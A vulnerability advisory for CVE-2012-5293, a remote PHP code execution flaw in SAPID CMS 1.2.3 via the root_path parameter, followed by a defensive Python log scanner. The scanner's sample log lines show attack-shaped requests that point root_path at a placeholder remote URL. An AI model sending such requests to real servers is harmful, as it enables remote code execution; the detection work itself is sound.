Sapid · Sapid Cms · CVE-2012-5293
**Name of the Vulnerable Software and Affected Versions**
SAPID CMS version 1.2.3
**Description**
The issue allows remote attackers to execute arbitrary PHP code. This can be achieved via a URL in the `root_path` parameter to specific API endpoints, such as `usr/extensions/get_tree.inc.php` or `usr/extensions/get_infochannel.inc.php`.
**Recommendations**
For SAPID CMS version 1.2.3, consider restricting access to the `GLOBALS[root_path]` and `root_path` parameters in the affected API endpoints until a patch is available. As a temporary workaround, avoid using these parameters in `usr/extensions/get_tree.inc.php` and `usr/extensions/get_infochannel.inc.php` to minimize the risk of exploitation.
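
One way to check web server access logs for requests that set these parameters on the affected scripts, as an added example that is not part of the original advisory or of SAPID's code. It assumes the underscore spellings `root_path`, `get_tree.inc.php` and `get_infochannel.inc.php` and a combined-format access log; `php_name`, `is_suspect`, `scan` and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Names from the advisory; the underscore spellings are an assumption of this example.
AFFECTED_SCRIPTS = ("usr/extensions/get_tree.inc.php",
                    "usr/extensions/get_infochannel.inc.php")
BLOCKED_PARAMS = {"root_path", "globals[root_path]"}
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def php_name(name: str) -> str:
    """Approximate how PHP rewrites an input name before it becomes a variable:
    leading spaces are dropped and '.' or ' ' in the top-level name become '_'.
    The result is lowercased so the filter over-matches rather than misses."""
    head, sep, rest = name.lstrip(" ").partition("[")
    return (head.replace(".", "_").replace(" ", "_") + sep + rest).lower()

def is_suspect(target: str) -> bool:
    """True if the request targets an affected script and sets a blocked parameter."""
    parts = urlsplit(target)
    path = re.sub(r"/+", "/", unquote(parts.path)).lower()
    if not any(script in path for script in AFFECTED_SCRIPTS):
        return False
    names = (php_name(n) for n, _ in parse_qsl(parts.query, keep_blank_values=True))
    return any(n in BLOCKED_PARAMS for n in names)

def scan(lines):
    """Return the 1-based numbers of the log lines whose request is suspect."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and is_suspect(match.group(1)):
            hits.append(number)
    return hits

# Constructed sample lines (documentation addresses, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2012:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Oct/2012:10:00:02 +0000] "GET /usr/extensions/get_tree.inc.php?GLOBALS%5Broot_path%5D=http://example.invalid/ HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Oct/2012:10:00:05 +0000] "GET /cms/usr/extensions/get_infochannel.inc.php?root_path=http://example.invalid/ HTTP/1.1" 200 0',
    '198.51.100.4 - - [01/Oct/2012:10:01:00 +0000] "GET /usr/extensions/get_tree.inc.php HTTP/1.1" 200 312',
    '198.51.100.4 - - [01/Oct/2012:10:01:03 +0000] "GET /search.php?root_path=docs HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Access logs normally record only the query string, so parameters sent in a request body are not visible to this check and need a filter in front of the application instead.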